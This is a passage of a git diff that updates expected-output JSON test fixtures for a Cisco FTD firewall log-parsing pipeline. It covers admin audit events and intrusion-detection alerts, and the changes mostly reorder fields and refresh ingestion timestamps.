- "name": "lights_out_mgmt.cgi" - }, - "log": { - "level": "debug" - }, - "syslog": { - "facility": { - "code": 14 - } }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "type": "firewall", "product": "asa", "vendor": "Cisco" }, + "process": { + "name": "lights_out_mgmt.cgi" + }, "@timestamp": "2019-08-14T13:57:43.000Z", "ecs": { "version": "1.12.0" }, + "log": { + "level": "debug" + }, "host": { "name": "siem-management" }, + "syslog": { + "facility": { + "code": 14 + } + }, "event": { "severity": 7, - "ingested": "2021-12-09T13:35:07.581600100Z", + "ingested": "2021-12-14T14:40:02.507008300Z", "original": "\u003c14\u003eAug 14 2019 13:57:43 lights_out_mgmt.cgi: siem-management: admin@10.0.255.31, System \u003e Configuration \u003e Configuration \u003e /admin/lights_out_mgmt.cgi, Page View\u0000x0a\u0000x00", "code": "" }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "mojo_server.pl" - }, - "log": { - "level": "debug" - }, - "syslog": { - "facility": { - "code": 14 - } }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "type": "firewall", "product": "asa", "vendor": "Cisco" }, + "process": { + "name": "mojo_server.pl" + }, "@timestamp": "2019-08-14T13:58:02.000Z", "ecs": { "version": "1.12.0" }, + "log": { + "level": "debug" + }, "host": { "name": "siem-management" }, + "syslog": { + "facility": { + "code": 14 + } + }, "event": { "severity": 7, - "ingested": "2021-12-09T13:35:07.581604700Z", + "ingested": "2021-12-14T14:40:02.507008691Z", "original": "\u003c14\u003eAug 14 2019 13:58:02 mojo_server.pl: siem-management: admin@10.0.255.31, Cloud Services, View url filtering settings\u0000x0a\u0000x00", "code": "" }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "mojo_server.pl" - }, - "log": { - "level": "debug" - }, - "syslog": { - "facility": { - "code": 14 - } }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "type": "firewall", "product": "asa", "vendor": "Cisco" }, + "process": { + "name": "mojo_server.pl" + }, "@timestamp": "2019-08-14T13:58:02.000Z", "ecs": { "version": "1.12.0" }, + "log": { + "level": "debug" + }, "host": { "name": "siem-management" }, + "syslog": { + "facility": { + "code": 14 + } + }, "event": { "severity": 7, - "ingested": "2021-12-09T13:35:07.581609600Z", + "ingested": "2021-12-14T14:40:02.507009094Z", "original": "\u003c14\u003eAug 14 2019 13:58:02 mojo_server.pl: siem-management: admin@10.0.255.31, Cloud Services, View amp settings\u0000x0a\u0000x00", "code": "" }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "mojo_server.pl" - }, - "log": { - "level": "debug" - }, - "syslog": { - "facility": { - "code": 14 - } }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "type": "firewall", "product": "asa", "vendor": "Cisco" }, + "process": { + "name": "mojo_server.pl" + }, "@timestamp": "2019-08-14T13:58:20.000Z", "ecs": { "version": "1.12.0" }, + "log": { + "level": "debug" + }, "host": { "name": "siem-management" }, + "syslog": { + "facility": { + "code": 14 + } + }, "event": { "severity": 7, - "ingested": "2021-12-09T13:35:07.581615400Z", + "ingested": "2021-12-14T14:40:02.507009485Z", "original": "\u003c14\u003eAug 14 2019 13:58:20 mojo_server.pl: siem-management: admin@10.0.255.31, System \u003e Monitoring \u003e Syslog, Page View\u0000x0a\u0000x00", "code": "" }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "mojo_server.pl" - }, - "log": { - "level": "debug" - }, - "syslog": { - "facility": { - "code": 14 - } }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "type": "firewall", "product": "asa", "vendor": "Cisco" }, + "process": { + "name": "mojo_server.pl" + }, "@timestamp": "2019-08-14T13:58:41.000Z", "ecs": { "version": "1.12.0" }, + "log": { + "level": "debug" + }, "host": { "name": "siem-management" }, + "syslog": { + "facility": { + "code": 14 + } + }, "event": { "severity": 7, - "ingested": "2021-12-09T13:35:07.581621Z", + "ingested": "2021-12-14T14:40:02.507009876Z", "original": "\u003c14\u003eAug 14 2019 13:58:41 mojo_server.pl: siem-management: admin@10.0.255.31, Devices \u003e Device Management, Page View\u0000x0a\u0000x00", "code": "" }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "sfdccsm" - }, - "log": { - "level": "debug" - }, - "syslog": { - "facility": { - "code": 14 - } }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "type": "firewall", "product": "asa", "vendor": "Cisco" }, + "process": { + "name": "sfdccsm" + }, "@timestamp": "2019-08-14T13:58:47.000Z", "ecs": { "version": "1.12.0" }, + "log": { + "level": "debug" + }, "host": { "name": "siem-management" }, + "syslog": { + "facility": { + "code": 14 + } + }, "event": { "severity": 7, - "ingested": "2021-12-09T13:35:07.581626600Z", + "ingested": "2021-12-14T14:40:02.507010266Z", "original": "\u003c14\u003eAug 14 2019 13:58:47 sfdccsm: siem-management: admin@10.0.255.31, Devices \u003e Device Management \u003e NGFW Interfaces, Page View\u0000x0a\u0000x00", "code": "" }, "cisco": { "ftd": {} - } + }, + "tags": [ + "preserve_original_event" + ] }, { - "process": { - "name": "mojo_server.pl" - }, - "log": { - "level": "debug" - }, - "syslog": { - "facility": { - "code": 14 - } - }, - "tags": [ - "preserve_original_event" - ], "observer": { "type": "firewall", "product": "asa", "vendor": "Cisco" }, + "process": { + "name": "mojo_server.pl" + }, "@timestamp": "2019-08-14T13:58:52.000Z", "ecs": { "version": "1.12.0" }, + "log": { + "level": "debug" + }, "host": { "name": "siem-management" }, + "syslog": { + "facility": { + "code": 14 + } + }, "event": { "severity": 7, - "ingested": "2021-12-09T13:35:07.581632200Z", + "ingested": "2021-12-14T14:40:02.507010651Z", "original": "\u003c14\u003eAug 14 2019 13:58:52 mojo_server.pl: siem-management: admin@10.0.255.31, Devices \u003e Device Management \u003e NGFW Device Summary, Page View\u0000x0a\u0000x00", "code": "" }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "mojo_server.pl" - }, - "log": { - "level": "debug" - }, - "syslog": { - "facility": { - "code": 14 - } }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "type": "firewall", "product": "asa", "vendor": "Cisco" }, + "process": { + "name": "mojo_server.pl" + }, "@timestamp": "2019-08-14T13:58:54.000Z", "ecs": { "version": "1.12.0" }, + "log": { + "level": "debug" + }, "host": { "name": "siem-management" }, + "syslog": { + "facility": { + "code": 14 + } + }, "event": { "severity": 7, - "ingested": "2021-12-09T13:35:07.581638200Z", + "ingested": "2021-12-14T14:40:02.507011204Z", "original": "\u003c14\u003eAug 14 2019 13:58:54 mojo_server.pl: siem-management: admin@10.0.255.31, Devices \u003e Device Management \u003e NGFW Device Summary, Page View\u0000x0a\u0000x00", "code": "" }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "sfdccsm" - }, - "log": { - "level": "debug" - }, - "syslog": { - "facility": { - "code": 14 - } }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "type": "firewall", "product": "asa", "vendor": "Cisco" }, + "process": { + "name": "sfdccsm" + }, "@timestamp": "2019-08-14T13:59:10.000Z", "ecs": { "version": "1.12.0" }, + "log": { + "level": "debug" + }, "host": { "name": "siem-management" }, + "syslog": { + "facility": { + "code": 14 + } + }, "event": { "severity": 7, - "ingested": "2021-12-09T13:35:07.581643900Z", + "ingested": "2021-12-14T14:40:02.507011590Z", "original": "\u003c14\u003eAug 14 2019 13:59:10 sfdccsm: siem-management: admin@10.0.255.31, Devices \u003e Platform Settings, Page View\u0000x0a\u0000x00", "code": "" }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "sfdccsm" - }, - "log": { - "level": "debug" - }, - "syslog": { - "facility": { - "code": 14 - } }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "type": "firewall", "product": "asa", "vendor": "Cisco" }, + "process": { + "name": "sfdccsm" + }, "@timestamp": "2019-08-14T13:59:15.000Z", "ecs": { "version": "1.12.0" }, + "log": { + "level": "debug" + }, "host": { "name": "siem-management" }, + "syslog": { + "facility": { + "code": 14 + } + }, "event": { "severity": 7, - "ingested": "2021-12-09T13:35:07.581649600Z", + "ingested": "2021-12-14T14:40:02.507011982Z", "original": "\u003c14\u003eAug 14 2019 13:59:15 sfdccsm: siem-management: admin@10.0.255.31, Devices \u003e Platform Settings \u003e Platform Settings Editor, Page View\u0000x0a\u0000x00", "code": "" }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "sfdccsm" - }, - "log": { - "level": "debug" - }, - "syslog": { - "facility": { - "code": 14 - } }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "type": "firewall", "product": "asa", "vendor": "Cisco" }, + "process": { + "name": "sfdccsm" + }, "@timestamp": "2019-08-14T14:00:37.000Z", "ecs": { "version": "1.12.0" }, + "log": { + "level": "debug" + }, "host": { "name": "siem-management" }, + "syslog": { + "facility": { + "code": 14 + } + }, "event": { "severity": 7, - "ingested": "2021-12-09T13:35:07.581655100Z", + "ingested": "2021-12-14T14:40:02.507012378Z", "original": "\u003c14\u003eAug 14 2019 14:00:37 sfdccsm: siem-management: admin@10.0.255.31, Devices \u003e Platform Settings \u003e Platform Settings Editor, Save Policy ftd-policy\u0000x0a\u0000x00", "code": "" }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "sfdccsm" - }, - "log": { - "level": "debug" - }, - "syslog": { - "facility": { - "code": 14 - } }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "type": "firewall", "product": "asa", "vendor": "Cisco" }, + "process": { + "name": "sfdccsm" + }, "@timestamp": "2019-08-14T14:00:37.000Z", "ecs": { "version": "1.12.0" }, + "log": { + "level": "debug" + }, "host": { "name": "siem-management" }, + "syslog": { + "facility": { + "code": 14 + } + }, "event": { "severity": 7, - "ingested": "2021-12-09T13:35:07.581660800Z", + "ingested": "2021-12-14T14:40:02.507012770Z", "original": "\u003c14\u003eAug 14 2019 14:00:37 sfdccsm: siem-management: admin@10.0.255.31, Devices \u003e Platform Settings \u003e Platform Settings Editor, Modified: Syslog\u0000x0a\u0000x00", "code": "" }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "sfdccsm" - }, - "log": { - "level": "debug" - }, - "syslog": { - "facility": { - "code": 14 - } }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "type": "firewall", "product": "asa", "vendor": "Cisco" }, + "process": { + "name": "sfdccsm" + }, "@timestamp": "2019-08-14T14:00:37.000Z", "ecs": { "version": "1.12.0" }, + "log": { + "level": "debug" + }, "host": { "name": "siem-management" }, + "syslog": { + "facility": { + "code": 14 + } + }, "event": { "severity": 7, - "ingested": "2021-12-09T13:35:07.581666600Z", + "ingested": "2021-12-14T14:40:02.507013295Z", "original": "\u003c14\u003eAug 14 2019 14:00:37 sfdccsm: siem-management: admin@10.0.255.31, Devices \u003e Platform Settings \u003e Platform Settings Editor, Page View\u0000x0a\u0000x00", "code": "" }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "sfdccsm" - }, - "log": { - "level": "debug" - }, - "syslog": { - "facility": { - "code": 14 - } }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "type": "firewall", "product": "asa", "vendor": "Cisco" }, + "process": { + "name": "sfdccsm" + }, "@timestamp": "2019-08-14T14:01:12.000Z", "ecs": { "version": "1.12.0" }, + "log": { + "level": "debug" + }, "host": { "name": "siem-management" }, + "syslog": { + "facility": { + "code": 14 + } + }, "event": { "severity": 7, - "ingested": "2021-12-09T13:35:07.581675100Z", + "ingested": "2021-12-14T14:40:02.507013709Z", "original": "\u003c14\u003eAug 14 2019 14:01:12 sfdccsm: siem-management: admin@10.0.255.31, Devices \u003e Platform Settings \u003e Platform Settings Editor, Save Policy ftd-policy\u0000x0a\u0000x00", "code": "" }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "sfdccsm" - }, - "log": { - "level": "debug" - }, - "syslog": { - "facility": { - "code": 14 - } }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "type": "firewall", "product": "asa", "vendor": "Cisco" }, + "process": { + "name": "sfdccsm" + }, "@timestamp": "2019-08-14T14:01:12.000Z", "ecs": { "version": "1.12.0" }, + "log": { + "level": "debug" + }, "host": { "name": "siem-management" }, + "syslog": { + "facility": { + "code": 14 + } + }, "event": { "severity": 7, - "ingested": "2021-12-09T13:35:07.581679900Z", + "ingested": "2021-12-14T14:40:02.507014099Z", "original": "\u003c14\u003eAug 14 2019 14:01:12 sfdccsm: siem-management: admin@10.0.255.31, Devices \u003e Platform Settings \u003e Platform Settings Editor, Modified: Syslog\u0000x0a\u0000x00", "code": "" }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "sfdccsm" - }, - "log": { - "level": "debug" - }, - "syslog": { - "facility": { - "code": 14 - } }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "type": "firewall", "product": "asa", "vendor": "Cisco" }, + "process": { + "name": "sfdccsm" + }, "@timestamp": "2019-08-14T14:01:13.000Z", "ecs": { "version": "1.12.0" }, + "log": { + "level": "debug" + }, "host": { "name": "siem-management" }, + "syslog": { + "facility": { + "code": 14 + } + }, "event": { "severity": 7, - "ingested": "2021-12-09T13:35:07.581685800Z", + "ingested": "2021-12-14T14:40:02.507014472Z", "original": "\u003c14\u003eAug 14 2019 14:01:13 sfdccsm: siem-management: admin@10.0.255.31, Devices \u003e Platform Settings \u003e Platform Settings Editor, Page View\u0000x0a\u0000x00", "code": "" }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "sfdccsm" - }, - "log": { - "level": "debug" - }, - "syslog": { - "facility": { - "code": 14 - } }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "type": "firewall", "product": "asa", "vendor": "Cisco" }, + "process": { + "name": "sfdccsm" + }, "@timestamp": "2019-08-14T14:01:20.000Z", "ecs": { "version": "1.12.0" }, + "log": { + "level": "debug" + }, "host": { "name": "siem-management" }, + "syslog": { + "facility": { + "code": 14 + } + }, "event": { "severity": 7, - "ingested": "2021-12-09T13:35:07.581690800Z", + "ingested": "2021-12-14T14:40:02.507014866Z", "original": "\u003c14\u003eAug 14 2019 14:01:20 sfdccsm: siem-management: csm_processes@Default User IP, Login, Login Success\u0000x0a\u0000x00", "code": "" }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "ActionQueueScrape.pl" - }, - "log": { - "level": "debug" - }, - "syslog": { - "facility": { - "code": 14 - } }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "type": "firewall", "product": "asa", "vendor": "Cisco" }, + "process": { + "name": "ActionQueueScrape.pl" + }, "@timestamp": "2019-08-14T14:01:31.000Z", "ecs": { "version": "1.12.0" }, + "log": { + "level": "debug" + }, "host": { "name": "siem-management" }, + "syslog": { + "facility": { + "code": 14 + } + }, "event": { "severity": 7, - "ingested": "2021-12-09T13:35:07.581694800Z", + "ingested": "2021-12-14T14:40:02.507015255Z", "original": "\u003c14\u003eAug 14 2019 14:01:31 ActionQueueScrape.pl: siem-management: csm_processes@Default User IP, Login, Login Success\u0000x0a\u0000x00", "code": "" }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "ActionQueueScrape.pl" - }, - "log": { - "level": "debug" - }, - "syslog": { - "facility": { - "code": 14 - } }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "type": "firewall", "product": "asa", "vendor": "Cisco" }, + "process": { + "name": "ActionQueueScrape.pl" + }, "@timestamp": "2019-08-14T14:01:31.000Z", "ecs": { "version": "1.12.0" }, + "log": { + "level": "debug" + }, "host": { "name": "siem-management" }, + "syslog": { + "facility": { + "code": 14 + } + }, "event": { "severity": 7, - "ingested": "2021-12-09T13:35:07.581699100Z", + "ingested": "2021-12-14T14:40:02.507018267Z", "original": "\u003c14\u003eAug 14 2019 14:01:31 ActionQueueScrape.pl: siem-management: admin@localhost, Task Queue, Successful task completion : Pre-deploy Global Configuration Generation\u0000x0a\u0000x00", "code": "" }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "ActionQueueScrape.pl" - }, - "log": { - "level": "debug" - }, - "syslog": { - "facility": { - "code": 14 - } }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "type": "firewall", "product": "asa", "vendor": "Cisco" }, - "@timestamp": "2019-08-14T14:01:35.000Z", - "ecs": { - "version": "1.12.0" - }, - "host": { - "name": "siem-management" - }, - "event": { - "severity": 7, - "ingested": "2021-12-09T13:35:07.581702900Z", - "original": "\u003c14\u003eAug 14 2019 14:01:35 ActionQueueScrape.pl: siem-management: csm_processes@Default User IP, Login, Login Success\u0000x0a\u0000x00", - "code": "" - }, - "cisco": { - "ftd": {} - } - }, - { "process": { "name": "ActionQueueScrape.pl" }, + "@timestamp": "2019-08-14T14:01:35.000Z", + "ecs": { + "version": "1.12.0" + }, "log": { "level": "debug" }, + "host": { + "name": "siem-management" + }, "syslog": { "facility": { "code": 14 } }, + "event": { + "severity": 7, + "ingested": "2021-12-14T14:40:02.507018777Z", + "original": "\u003c14\u003eAug 14 2019 14:01:35 ActionQueueScrape.pl: siem-management: csm_processes@Default User IP, Login, Login Success\u0000x0a\u0000x00", + "code": "" + }, + "cisco": { + "ftd": {} + }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "type": "firewall", "product": "asa", "vendor": "Cisco" }, + "process": { + "name": "ActionQueueScrape.pl" + }, "@timestamp": "2019-08-14T14:01:36.000Z", "ecs": { "version": "1.12.0" }, + "log": { + "level": "debug" + }, "host": { "name": "siem-management" }, + "syslog": { + "facility": { + "code": 14 + } + }, "event": { "severity": 7, - "ingested": "2021-12-09T13:35:07.581707700Z", + "ingested": "2021-12-14T14:40:02.507019165Z", "original": "\u003c14\u003eAug 14 2019 14:01:36 ActionQueueScrape.pl: siem-management: admin@localhost, Task Queue, Successful task completion : Pre-deploy Device Configuration for siem-ftd\u0000x0a\u0000x00", "code": "" }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "mojo_server.pl" - }, - "log": { - "level": "debug" - }, - "syslog": { - "facility": { - "code": 14 - } }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "type": "firewall", "product": "asa", "vendor": "Cisco" }, + "process": { + "name": "mojo_server.pl" + }, "@timestamp": "2019-08-14T14:01:55.000Z", "ecs": { "version": "1.12.0" }, + "log": { + "level": "debug" + }, "host": { "name": "siem-management" }, + "syslog": { + "facility": { + "code": 14 + } + }, "event": { "severity": 7, - "ingested": "2021-12-09T13:35:07.581713400Z", + "ingested": "2021-12-14T14:40:02.507019552Z", "original": "\u003c14\u003eAug 14 2019 14:01:55 mojo_server.pl: siem-management: admin@10.0.255.31, System \u003e Configuration \u003e Configuration, Page View\u0000x0a\u0000x00", "code": "" }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "sfdccsm" - }, - "log": { - "level": "debug" - }, - "syslog": { - "facility": { - "code": 14 - } }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "type": "firewall", "product": "asa", "vendor": "Cisco" }, + "process": { + "name": "sfdccsm" + }, "@timestamp": "2019-08-14T14:01:56.000Z", "ecs": { "version": "1.12.0" }, + "log": { + "level": "debug" + }, "host": { "name": "siem-management" }, + "syslog": { + "facility": { + "code": 14 + } + }, "event": { "severity": 7, - "ingested": "2021-12-09T13:35:07.581719Z", + "ingested": "2021-12-14T14:40:02.507019960Z", "original": "\u003c14\u003eAug 14 2019 14:01:56 sfdccsm: siem-management: admin@localhost, Task Queue, Policy Deployment to siem-ftd - SUCCESS\u0000x0a\u0000x00", "code": "" }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "sfdccsm" - }, - "log": { - "level": "debug" - }, - "syslog": { - "facility": { - "code": 14 - } }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "type": "firewall", "product": "asa", "vendor": "Cisco" }, + "process": { + "name": "sfdccsm" + }, "@timestamp": "2019-08-14T14:01:57.000Z", "ecs": { "version": "1.12.0" }, + "log": { + "level": "debug" + }, "host": { "name": "siem-management" }, + "syslog": { + "facility": { + "code": 14 + } + }, "event": { "severity": 7, - "ingested": "2021-12-09T13:35:07.581724600Z", + "ingested": "2021-12-14T14:40:02.507020343Z", "original": "\u003c14\u003eAug 14 2019 14:01:57 sfdccsm: siem-management: csm_processes@Default User IP, Login, Login Success\u0000x0a\u0000x00", "code": "" }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "mojo_server.pl" - }, - "log": { - "level": "debug" - }, - "syslog": { - "facility": { - "code": 14 - } }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "type": "firewall", "product": "asa", "vendor": "Cisco" }, + "process": { + "name": "mojo_server.pl" + }, "@timestamp": "2019-08-14T14:02:03.000Z", "ecs": { "version": "1.12.0" }, + "log": { + "level": "debug" + }, "host": { "name": "siem-management" }, + "syslog": { + "facility": { + "code": 14 + } + }, "event": { "severity": 7, - "ingested": "2021-12-09T13:35:07.581730100Z", + "ingested": "2021-12-14T14:40:02.507020752Z", "original": "\u003c14\u003eAug 14 2019 14:02:03 mojo_server.pl: siem-management: admin@10.0.255.31, System \u003e Monitoring \u003e Syslog, Page View\u0000x0a\u0000x00", "code": "" }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "index.cgi" - }, - "log": { - "level": "debug" - }, - "syslog": { - "facility": { - "code": 14 - } }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "type": "firewall", "product": "asa", "vendor": "Cisco" }, + "process": { + "name": "index.cgi" + }, "@timestamp": "2019-08-14T14:02:11.000Z", "ecs": { "version": "1.12.0" }, + "log": { + "level": "debug" + }, "host": { "name": "siem-management" }, + "syslog": { + "facility": { + "code": 14 + } + }, "event": { "severity": 7, - "ingested": "2021-12-09T13:35:07.581735800Z", + "ingested": "2021-12-14T14:40:02.507021141Z", "original": "\u003c14\u003eAug 14 2019 14:02:11 index.cgi: siem-management: admin@10.0.255.31, System \u003e Monitoring \u003e Audit, Page View\u0000x0a\u0000x00", "code": "" }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "mojo_server.pl" - }, - "log": { - "level": "debug" - }, - "syslog": { - "facility": { - "code": 14 - } }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "type": "firewall", "product": "asa", "vendor": "Cisco" }, + "process": { + "name": "mojo_server.pl" + }, "@timestamp": "2019-08-14T14:02:19.000Z", "ecs": { "version": "1.12.0" }, + "log": { + "level": "debug" + }, "host": { "name": "siem-management" }, + "syslog": { + "facility": { + "code": 14 + } + }, "event": { "severity": 7, - "ingested": "2021-12-09T13:35:07.581757800Z", + "ingested": "2021-12-14T14:40:02.507021531Z", "original": "\u003c14\u003eAug 14 2019 14:02:19 mojo_server.pl: siem-management: admin@10.0.255.31, System \u003e Configuration \u003e Configuration, Page View\u0000x0a\u0000x00", "code": "" }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "platformSettingEdit.cgi" - }, - "log": { - "level": "debug" - }, - "syslog": { - "facility": { - "code": 14 - } }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "type": "firewall", "product": "asa", "vendor": "Cisco" }, + "process": { + "name": "platformSettingEdit.cgi" + }, "@timestamp": "2019-08-14T14:02:31.000Z", "ecs": { "version": "1.12.0" }, + "log": { + "level": "debug" + }, "host": { "name": "siem-management" }, + "syslog": { + "facility": { + "code": 14 + } + }, "event": { "severity": 7, - "ingested": "2021-12-09T13:35:07.581763300Z", + "ingested": "2021-12-14T14:40:02.507021925Z", "original": "\u003c14\u003eAug 14 2019 14:02:31 platformSettingEdit.cgi: siem-management: admin@10.0.255.31, System \u003e Configuration \u003e Configuration \u003e /platinum/platformSettingEdit.cgi?type=AuditLog, Page View\u0000x0a\u0000x00", "code": "" }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "platformSettingEdit.cgi" - }, - "log": { - "level": "debug" - }, - "syslog": { - "facility": { - "code": 14 - } }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "type": "firewall", "product": "asa", "vendor": "Cisco" }, + "process": { + "name": "platformSettingEdit.cgi" + }, "@timestamp": "2019-08-14T14:02:38.000Z", "ecs": { "version": "1.12.0" }, + "log": { + "level": "debug" + }, "host": { "name": "siem-management" }, + "syslog": { + "facility": { + "code": 14 + } + }, "event": { "severity": 7, - "ingested": "2021-12-09T13:35:07.581768600Z", + "ingested": "2021-12-14T14:40:02.507022360Z", "original": "\u003c14\u003eAug 14 2019 14:02:38 platformSettingEdit.cgi: siem-management: admin@10.0.255.31, Devices \u003e Platform Settings \u003e Local System Configuration, Save Local System Configuration\u0000x0a\u0000x00", "code": "" }, "cisco": { "ftd": {} - } - }, - { - "process": { - "name": "platformSettingEdit.cgi" - }, - "log": { - "level": "debug" - }, - "syslog": { - "priority": 2, - "facility": { - "code": 14 - } }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "type": "firewall", "product": "asa", "vendor": "Cisco" }, + "process": { + "name": "platformSettingEdit.cgi" + }, "@timestamp": "2019-08-14T14:02:38.000Z", "ecs": { "version": "1.12.0" }, + "log": { + "level": "debug" + }, "host": { "name": "siem-management" }, + "syslog": { + "priority": 2, + "facility": { + "code": 14 + } + }, "event": { "severity": 7, - "ingested": "2021-12-09T13:35:07.581774Z", + "ingested": "2021-12-14T14:40:02.507022748Z", "original": "\u003c14.2\u003eAug 14 2019 14:02:38 platformSettingEdit.cgi: siem-management: admin@10.0.255.31, Devices \u003e Platform Settings \u003e Audit Log Settings \u003e Modified: Send Audit Log to Syslog enabled \u003e Disabled", "code": "" }, @@ -1259,7 +1256,10 @@ "ftd": { "security": {} } - } + }, + "tags": [ + "preserve_original_event" + ] } ] } \ No newline at end of file diff --git a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-intrusion.log-expected.json b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-intrusion.log-expected.json index 6890093aabc..294b433c0c0 100644 --- a/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-intrusion.log-expected.json +++ b/packages/cisco_ftd/data_stream/log/_dev/test/pipeline/test-intrusion.log-expected.json @@ -15,15 +15,15 @@ "ip": "10.0.1.20" }, "message": "SERVER-WEBAPP Ipswitch WhatsUp Small Business directory traversal attempt", - "tags": [ - "preserve_original_event" - ], "network": { "protocol": "http", "transport": "tcp", "application": "firefox", "iana_number": "6" }, + "tags": [ + "preserve_original_event" + ], "observer": { "ingress": { "interface": { @@ -64,7 +64,7 @@ }, "event": { "severity": 0, - "ingested": "2021-12-09T13:35:09.413139500Z", + "ingested": "2021-12-14T14:40:04.416568919Z", "original": "2019-08-16T09:54:00Z firepower %FTD-0-430001: SrcIP: 10.0.1.20, DstIP: 10.0.100.30, SrcPort: 55644, DstPort: 80, Protocol: tcp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, Priority: 1, GID: 1, SID: 17279, Revision: 12, Message: SERVER-WEBAPP Ipswitch WhatsUp Small Business directory traversal attempt, Classification: Attempted User Privilege Gain, User: No Authentication Required, Client: Firefox, ApplicationProtocol: HTTP, IntrusionPolicy: intrusion-policy, ACPolicy: default, NAPPolicy: Balanced Security and Connectivity", "code": "430001", "kind": "alert", @@ -129,15 +129,15 @@ "ip": "10.0.1.20" }, "message": "SERVER-WEBAPP Ipswitch WhatsUp Small Business directory traversal attempt", - "tags": [ - "preserve_original_event" - ], "network": { "protocol": "http", "transport": "tcp", "application": "firefox", "iana_number": "6" }, + "tags": [ + "preserve_original_event" + ], "observer": { "ingress": { "interface": { @@ -178,7 +178,7 @@ }, "event": { "severity": 0, - "ingested": "2021-12-09T13:35:09.413148400Z", + "ingested": "2021-12-14T14:40:04.416572028Z", "original": "2019-08-16T09:57:02Z firepower %FTD-0-430001: SrcIP: 10.0.1.20, DstIP: 10.0.100.30, SrcPort: 55868, DstPort: 80, Protocol: tcp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, Priority: 1, GID: 1, SID: 17279, Revision: 12, Message: SERVER-WEBAPP Ipswitch WhatsUp Small Business directory traversal attempt, Classification: Attempted User Privilege Gain, User: No Authentication Required, Client: Firefox, ApplicationProtocol: HTTP, IntrusionPolicy: intrusion-policy, ACPolicy: default, NAPPolicy: Balanced Security and Connectivity", "code": "430001", "kind": "alert", @@ -243,13 +243,13 @@ "ip": "10.0.100.30" }, "message": "APP-DETECT failed FTP login attempt", - "tags": [ - "preserve_original_event" - ], "network": { "iana_number": "6", "transport": "tcp" }, + "tags": [ + "preserve_original_event" + ], "observer": { "ingress": { "interface": { @@ -290,7 +290,7 @@ }, "event": { "severity": 0, - "ingested": "2021-12-09T13:35:09.413154500Z", + "ingested": "2021-12-14T14:40:04.416572532Z", "original": "2019-08-16T10:04:44Z firepower %FTD-0-430001: SrcIP: 10.0.100.30, DstIP: 10.0.1.20, SrcPort: 21, DstPort: 39114, Protocol: tcp, IngressInterface: outside, EgressInterface: inside, IngressZone: output-zone, EgressZone: input-zone, Priority: 3, GID: 1, SID: 13360, Revision: 6, Message: APP-DETECT failed FTP login attempt, Classification: Misc Activity, User: No Authentication Required, IntrusionPolicy: intrusion-policy, ACPolicy: default, NAPPolicy: Balanced Security and Connectivity", "code": "430001", "kind": "alert", @@ -353,13 +353,13 @@ "ip": "10.0.100.30" }, "message": "APP-DETECT failed FTP login attempt", - "tags": [ - "preserve_original_event" - ], "network": { "iana_number": "6", "transport": "tcp" }, + "tags": [ + "preserve_original_event" + ], "observer": { "ingress": { "interface": { @@ -400,7 +400,7 @@ }, "event": { "severity": 0, - "ingested": "2021-12-09T13:35:09.413158900Z", + "ingested": "2021-12-14T14:40:04.416572956Z", "original": "2019-08-16T10:09:47Z firepower %FTD-0-430001: SrcIP: 10.0.100.30, DstIP: 10.0.1.20, SrcPort: 21, DstPort: 40740, 